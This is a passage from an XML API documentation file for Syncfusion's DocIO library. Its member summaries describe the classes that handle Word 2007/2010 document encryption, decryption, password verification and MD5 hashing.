        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier">
            <summary>
            Represents the encryption verifier for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.m_arrSalt">
            <summary>
            An array of bytes that specifies the salt value used during password hash
            generation. MUST NOT be the same data used for the verifier stored encrypted
            in the EncryptedVerifier field.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.m_arrEncryptedVerifier">
            <summary>
            MUST be the randomly generated Verifier value encrypted using the algorithm
            chosen by the implementation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.m_arrEncryptedVerifierHash">
            <summary>
            An array of bytes that contains the encrypted form of the hash of the randomly
            generated Verifier value. The length of the array MUST be the size of the
            encryption block size multiplied by the number of blocks needed to encrypt
            the hash of the Verifier. If the encryption algorithm is RC4, the length
            MUST be 20 bytes. If the encryption algorithm is AES, the length MUST be 32 bytes.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.m_iVerifierHashSize">
            <summary>
            Size of the verifier hash.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the verifier.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.Parse(System.IO.Stream)">
            <summary>
            Extracts object from stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.Salt">
            <summary>
            An array of bytes that specifies the salt value used during password hash
            generation. MUST NOT be the same data used for the verifier stored encrypted
            in the EncryptedVerifier field.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.EncryptedVerifier">
            <summary>
            MUST be the randomly generated Verifier value encrypted using the algorithm
            chosen by the implementation.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.EncryptedVerifierHash">
            <summary>
            An array of bytes that contains the encrypted form of the hash of the randomly
            generated Verifier value. The length of the array MUST be the size of the
            encryption block size multiplied by the number of blocks needed to encrypt
            the hash of the Verifier. If the encryption algorithm is RC4, the length
            MUST be 20 bytes. If the encryption algorithm is AES, the length MUST be 32 bytes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.EncryptionVerifier.VerifierHashSize">
            <summary>
            Gets/sets size of the verifier hash.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.MD5Context">
            <summary>
            Summary description for MD5_CTX.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.m_uiI">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.m_buf">
            <summary>
            scratch buffer
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.m_in">
            <summary>
            input buffer
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.m_digest">
            <summary>
            actual digest after MD5Final call
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.Update(System.Byte[],System.UInt32)">
            <summary>
            Updates
            </summary>
            <param name="inBuf">The input buf.</param>
            <param name="inLen">The buffer length.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.Final">
            <summary>
            Finals this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.StoreDigest">
            <summary>
            Stores the digest.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.F(System.UInt32,System.UInt32,System.UInt32)">
            <summary>
            F(x, y, z)
            </summary>
            <param name="x">The x.</param>
            <param name="y">The y.</param>
            <param name="z">The z.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.G(System.UInt32,System.UInt32,System.UInt32)">
            <summary>
            G(x, y, z)
            </summary>
            <param name="x">The x.</param>
            <param name="y">The y.</param>
            <param name="z">The z.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.H(System.UInt32,System.UInt32,System.UInt32)">
            <summary>
            H(x, y, z)
            </summary>
            <param name="x">The x.</param>
            <param name="y">The y.</param>
            <param name="z">The z.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.III(System.UInt32,System.UInt32,System.UInt32)">
            <summary>
            I(x, y, z)
            </summary>
            <param name="x">The x.</param>
            <param name="y">The y.</param>
            <param name="z">The z.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.ROTATE_LEFT(System.UInt32,System.Byte)">
            <summary>
            ROTATE_LEFT
            </summary>
            <param name="x">The x.</param>
            <param name="n">The n.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.FF(System.UInt32@,System.UInt32,System.UInt32,System.UInt32,System.UInt32,System.Byte,System.UInt32)">
            <summary>
            FF
            </summary>
            <param name="a">A.</param>
            <param name="b">The b.</param>
            <param name="c">The c.</param>
            <param name="d">The d.</param>
            <param name="x">The x.</param>
            <param name="s">The s.</param>
            <param name="ac">The ac.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.GG(System.UInt32@,System.UInt32,System.UInt32,System.UInt32,System.UInt32,System.Byte,System.UInt32)">
            <summary>
            GG
            </summary>
            <param name="a">A.</param>
            <param name="b">The b.</param>
            <param name="c">The c.</param>
            <param name="d">The d.</param>
            <param name="x">The x.</param>
            <param name="s">The s.</param>
            <param name="ac">The ac.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.HH(System.UInt32@,System.UInt32,System.UInt32,System.UInt32,System.UInt32,System.Byte,System.UInt32)">
            <summary>
            HH
            </summary>
            <param name="a">A.</param>
            <param name="b">The b.</param>
            <param name="c">The c.</param>
            <param name="d">The d.</param>
            <param name="x">The x.</param>
            <param name="s">The s.</param>
            <param name="ac">The ac.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.II(System.UInt32@,System.UInt32,System.UInt32,System.UInt32,System.UInt32,System.Byte,System.UInt32)">
            <summary>
            II
            </summary>
            <param name="a">A.</param>
            <param name="b">The b.</param>
            <param name="c">The c.</param>
            <param name="d">The d.</param>
            <param name="x">The x.</param>
            <param name="s">The s.</param>
            <param name="ac">The ac.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.Transform(System.UInt32[])">
            <summary>
            Transforms the specified inn.
            </summary>
            <param name="inn">The inn.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.I">
            <summary>
            Gets the I.
            </summary>
            <value>The I.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.Buffer">
            <summary>
            Gets the buffer.
            </summary>
            <value>The buffer.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.InBuffer">
            <summary>
            Gets the input buffer.
            </summary>
            <value>The input buffer.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.MD5Context.Digest">
            <summary>
            Gets the digest.
            </summary>
            <value>The digest.</value>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper">
            <summary>
            This class contains utility methods used by Word 2007 and Word 2010 Encryption/Decryption implementation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.PasswordIterationCount">
            <summary>
            Number of iterations used for key generation.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncryptionInfoStream">
            <summary>
            Name of encryption info stream.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.DataSpacesStorage">
            <summary>
            Name of dataspaces storage.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.DataSpaceMapStream">
            <summary>
            Name of dataspace map stream.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.TransformPrimaryStream">
            <summary>
            Name of the transform primary stream.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.DataSpaceInfoStorage">
            <summary>
            Name of dataspace info storage.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.TransformInfoStorage">
            <summary>
            Name of transform info storage.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncryptedPackageStream">
            <summary>
            Name of encrypted package stream.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.GetEncryptionType(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Gets the type of the encryption.
            </summary>
            <param name="storage">The storage.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.ReadInt32(System.IO.Stream,System.Byte[])">
            <summary>
            Reads Int32 value from the stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="buffer">Temporary buffer to put extracted bytes into.</param>
            <returns>Extracted Int32 value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.ReadUnicodeString(System.IO.Stream)">
            <summary>
            Extracts padded unicode string from a stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <returns>Extracted string.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.ReadUnicodeStringZero(System.IO.Stream)">
            <summary>
            Read zero-terminated string from the stream.
            </summary>
            <param name="stream">Stream to get string from.</param>
            <returns>Extracted string (without trailing zero).</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.WriteInt32(System.IO.Stream,System.Int32)">
            <summary>
            Writes Int32 value into the stream.
            </summary>
            <param name="stream">Stream to put data into.</param>
            <param name="value">Value to write.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.WriteUnicodeString(System.IO.Stream,System.String)">
            <summary>
            Writes padded unicode string from a stream.
            </summary>
            <param name="stream">Stream to get data from.</param>
            <param name="value">Value to write.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.WriteUnicodeStringZero(System.IO.Stream,System.String)">
            <summary>
            Writes zero-terminated string into the stream.
            </summary>
            <param name="stream">Stream to put string into.</param>
            <param name="value">Value to write.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.CreateKey(System.String,System.Byte[],System.Int32)">
            <summary>
            Creates key object based on the salt and password.
            </summary>
            <param name="password">Password to use.</param>
            <param name="salt">Salt to use.</param>
            <param name="keyLength">Required key length.</param>
            <returns>Array with created key.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.CreateAgileEncryptionKey(System.Security.Cryptography.HashAlgorithm,System.String,System.Byte[],System.Byte[],System.Int32,System.Int32)">
            <summary>
            Creates the agile encryption key.
            </summary>
            <param name="password">The password.</param>
            <param name="salt">The salt.</param>
            <param name="blockKey">The block key.</param>
            <param name="keyLength">Length of the key.</param>
            <param name="iterationCount">The iteration count.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncryptDecrypt(System.Byte[],Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncryptionMethod,System.Int32)">
            <summary>
            Encrypts/decrypts buffer with specified method.
            </summary>
            <param name="data">Data to process.</param>
            <param name="method">Method to use.</param>
            <param name="blockSize">Size of the encryption block.</param>
            <returns>Modified (encrypted/decrypted) data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.CombineArray(System.Byte[],System.Byte[])">
            <summary>
            Combines two arrays into one.
            </summary>
            <param name="buffer1">The first buffer to combine.</param>
            <param name="buffer2">The second buffer to combine.</param>
            <returns>Combined array.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.CorrectSize(System.Byte[],System.Int32,System.Byte)">
            <summary>
            Corrects the size.
            </summary>
            <param name="hashBuf">The hash buf.</param>
            <param name="size">The size.</param>
            <param name="padding">The padding.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.ConcatenateIV(System.Byte[],System.Byte[])">
            <summary>
            Concatenates the IV.
            </summary>
            <param name="data">The data.</param>
            <param name="IV">The IV.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.CompareArray(System.Byte[],System.Byte[])">
            <summary>
            Compares the array.
            </summary>
            <param name="buffer1">The buffer1.</param>
            <param name="buffer2">The buffer2.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncrytionType">
            <summary>
            Represents type of the encryption.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncrytionType.Standard">
            <summary>
            Word 2007 encryption format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncrytionType.Agile">
            <summary>
            Word 2010 encryption format.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.SecurityHelper.EncrytionType.None">
            <summary>
            Wrong encryption format.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor">
            <summary>
            This class is responsible for decryption of Standard encryption (Word 2007) files.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.BlockSize">
            <summary>
            Size of the decryption block.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.m_dataSpaceMap">
            <summary>
            Dataspace map.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.m_info">
            <summary>
            Encryption info.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.m_storage">
            <summary>
            Compound storage that should be decrypted.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.m_arrKey">
            <summary>
            Array containing key data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.Decrypt">
            <summary>
            Decrypts internal storage.
            </summary>
            <returns>Decrypted stream.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.Initialize(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Prepares decryptor for actual decryption.
            </summary>
            <param name="storage">Compound storage to get required data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.CheckPassword(System.String)">
            <summary>
            Checks whether password is correct.
            </summary>
            <param name="password">Password to check.</param>
            <returns>True if password verification succeeded.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.Decrypt(System.Byte[],System.Byte[])">
            <summary>
            Decrypts specified buffer.
            </summary>
            <param name="data"></param>
            <param name="key"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.ParseTransfrom(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Extracts transform data from the storage.
            </summary>
            <param name="dataSpaces">Storage to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.ParseDataSpaceMap(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Extracts dataspace map from the storage.
            </summary>
            <param name="dataSpaces">Storage to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardDecryptor.ParseTransformInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Extracts TransformInfo from the storage.
            </summary>
            <param name="transformStorage">Storage to get data from.</param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo">
            <summary>
            Represents the standard encryption info for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.m_iVersionInfo">
            <summary>
            A Version structure where Version.vMajor MUST be 0x0003, and Version.vMinor MUST be 0x0002.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.m_iFlags">
            <summary>
            A copy of the Flags stored in the EncryptionHeader field of this structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.m_header">
            <summary>
            An EncryptionHeader structure that specifies parameters used to encrypt data.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.m_verifier">
            <summary>
            An EncryptionVerifier structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.VersionInfo">
            <summary>
            A Version structure where Version.vMajor MUST be 0x0003, and Version.vMinor MUST be 0x0002.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.Flags">
            <summary>
            A copy of the Flags stored in the EncryptionHeader field of this structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.Header">
            <summary>
            An EncryptionHeader structure that specifies parameters used to encrypt data.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptionInfo.Verifier">
            <summary>
            An EncryptionVerifier structure.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor">
            <summary>
            This class used to encrypt data using Standard encryption (Word 2007) with AES 128
            encryption algorithm and SHA-1 hashing algorithm.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.KeyLength">
            <summary>
            Key length.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.DefaultVersion">
            <summary>
            Default version.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.DefaultFlags">
            <summary>
            Default flags.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.AES128AlgorithmId">
            <summary>
            Encryption algorithm id (AES-128).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.SHA1AlgorithmHash">
            <summary>
            Hashing algorithm id (SHA-1).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.DefaultProviderType">
            <summary>
            Provider type.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.DefaultCSPName">
            <summary>
            Default CSP name.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.Encrypt(System.IO.Stream,System.String,Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Encrypts specified stream.
            </summary>
            <param name="data">Data to encrypt.</param>
            <param name="password">Password to use.</param>
            <param name="root">Root storage to put encrypted data into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.PrepareDataSpaces(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Preparse data spaces structures inside specified storage.
            </summary>
            <param name="root">Storage to put DataSpaces inside.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.SerializeVersion(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes VersionInfo stream inside specified storage.
            </summary>
            <param name="dataSpaces">Storage to serialize VersionInfo into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.SerializeTransformInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes transformation info.
            </summary>
            <param name="dataSpaces">Storage to serialize into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.SerializeDataSpaceInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes dataspace info.
            </summary>
            <param name="dataSpaces">Storage to serialize into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.SerializeDataSpaceMap(Syncfusion.CompoundFile.DocIO.ICompoundStorage)">
            <summary>
            Serializes DataSpaceMap stream.
            </summary>
            <param name="dataSpaces">Storage to place stream into.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.PrepareEncryptionInfo(Syncfusion.CompoundFile.DocIO.ICompoundStorage,System.String)">
            <summary>
            Prepare EncryptionInfo record and stores it in appropriate stream.
            </summary>
            <param name="root">Root storage.</param>
            <param name="password">Encryption password.</param>
            <returns>Encryption key.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.CreateSalt(System.Int32)">
            <summary>
            Creates random salt.
            </summary>
            <param name="length">Desired salt length.</param>
            <returns>Array with random data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.Encrypt(System.Byte[],System.Byte[])">
            <summary>
            Encrypts specified buffer.
            </summary>
            <param name="data">Data to encrypt.</param>
            <param name="key">Encryption key.</param>
            <returns>Encrypted data.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.StandardEncryptor.Encrypt(System.IO.Stream,System.Byte[],System.IO.Stream)">
            <summary>
            Encrypt specified stream.
            </summary>
            <param name="stream">Stream to encrypt.</param>
            <param name="key">Encryption key.</param>
            <param name="output">Output stream.</param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader">
            <summary>
            Represents the transform info header for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_iTransformType">
            <summary>
            An unsigned integer that specifies the type of transform to be applied.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_strTransformId">
            <summary>
            An identifier associated with a specific transform.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_strTransformName">
            <summary>
            The friendly name of the transform.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_iReaderVersion">
            <summary>
            The reader version.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_iUpdaterVersion">
            <summary>
            The updater version.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_iWriterVersion">
            <summary>
            The writer version.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.#ctor(System.IO.Stream)">
            <summary>
            Initializes new instance of the class.
            </summary>
            <param name="stream">Stream to get data from.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.TransformType">
            <summary>
            An unsigned integer that specifies the type of transform to be applied.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.TransformId">
            <summary>
            An identifier associated with a specific transform.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.TransformName">
            <summary>
            The friendly name of the transform.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.ReaderVersion">
            <summary>
            The reader version.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.UpdaterVersion">
            <summary>
            The updater version.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.TransformInfoHeader.WriterVersion">
            <summary>
            The writer version.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo">
            <summary>
            Represents the version information for Encryption/Decryption of Word documents.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.m_strFeatureId">
            <summary>
            The functionality for which the DataSpaceVersionInfo structure specifies
            version information. MUST be "Microsoft.Container.DataSpaces".
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.m_iReaderVersion">
            <summary>
            The reader version of the data spaces structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.m_iUpdaterVersion">
            <summary>
            The updater version of the data spaces structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.m_iWriterVersion">
            <summary>
            The writer version of the data spaces structure.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.m_securityHelper">
            <summary>
            Security helper contains utility methods for encryption/decryption.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.#ctor">
            <summary>
            Default constructor.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.Serialize(System.IO.Stream)">
            <summary>
            Serializes object into specified stream.
            </summary>
            <param name="stream">Stream to serialize into.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.FeatureId">
            <summary>
            The functionality for which the DataSpaceVersionInfo structure specifies
            version information. MUST be "Microsoft.Container.DataSpaces".
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.ReaderVersion">
            <summary>
            The reader version of the data spaces structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.UpdaterVersion">
            <summary>
            The updater version of the data spaces structure.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.Security.VersionInfo.WriterVersion">
            <summary>
            The writer version of the data spaces structure.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor">
            <summary>
            Represents an WordDecryptor.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_baDocumentID">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_baPoint">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_baHash">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_baPassword">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.Security.WordDecryptor.m_valContext">
            <summary>
            
            </summary>
        </member>
